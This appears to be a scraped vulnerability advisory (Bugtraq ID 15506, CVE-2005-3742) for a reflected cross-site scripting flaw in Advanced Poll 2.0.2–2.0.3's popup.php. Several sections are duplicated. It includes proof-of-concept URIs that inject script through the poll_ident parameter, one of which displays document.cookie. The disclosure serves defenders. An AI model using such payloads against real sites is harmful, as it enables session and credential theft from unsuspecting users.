Advanced Poll Popup.PHP Cross-Site Scripting Vulnerability
BID:15506
Info
Advanced Poll Popup.PHP Cross-Site Scripting Vulnerability
| Bugtraq ID: | 15506 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-3742 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 21 2005 12:00AM |
| Updated: | Jul 06 2007 06:17PM |
| Credit: | ][GB][ is credited with the discovery of this vulnerability. |
| Vulnerable: |
Advanced Poll Advanced Poll 2.0.3 Advanced Poll Advanced Poll 2.0.2 |
| Not Vulnerable: | |
Discussion
Advanced Poll Popup.PHP Cross-Site Scripting Vulnerability
Advanced Poll is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Advanced Poll is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Exploit / POC
Advanced Poll Popup.PHP Cross-Site Scripting Vulnerability
No exploit is required.
Example URIs have been provided:
http://www.example.com/poll/popup.php?action=results&poll_ident="><script>alert("hola vengo a flotar");</script>
http://www.example.com/poll/popup.php?action=results&poll_ident="><script>alert(document.cookie);</script>
No exploit is required.
Example URIs have been provided:
http://www.example.com/poll/popup.php?action=results&poll_ident="><script>alert("hola vengo a flotar");</script>
http://www.example.com/poll/popup.php?action=results&poll_ident="><script>alert(document.cookie);</script>
Solution / Fix
Advanced Poll Popup.PHP Cross-Site Scripting Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
Advanced Poll Popup.PHP Cross-Site Scripting Vulnerability
References:
References:
- Advanced Poll Web Site (Advanced Poll)